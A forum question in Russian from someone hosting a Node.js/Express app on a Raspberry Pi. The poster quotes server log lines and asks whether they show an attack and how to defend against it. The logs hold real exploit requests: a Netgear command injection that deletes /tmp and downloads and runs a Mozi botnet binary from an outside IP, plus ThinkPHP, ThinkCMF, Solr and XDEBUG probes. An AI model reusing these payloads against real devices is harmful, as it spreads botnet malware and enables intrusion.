Недавно я настроил домашний веб-сервер для запуска моего node.js и express веб-приложения (используя Raspberry Pi, в основном, чтобы выяснить, как это сделать).
Не долго (часы) после активации его в моем домене я зарегистрировал следующие запросы GET:
0|app.js | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://218.77.224.248:55400/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 404 23.779 ms - 922
0|app.js | GET /solr/admin/info/system?wt=json 404 25.780 ms - 922
0|app.js | GET /?XDEBUG_SESSION_START=phpstorm 200 24.322 ms - 170
0|app.js | GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 200 21.867 ms - 170
0|app.js | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP 404 25.449 ms - 922
Был ли мой сервер атакован?
Если да, то как злоумышленник нацелился на меня?
Как мне предотвратить атаки и обеспечить хорошую безопасность?
Или я все неправильно читаю?
Спасибо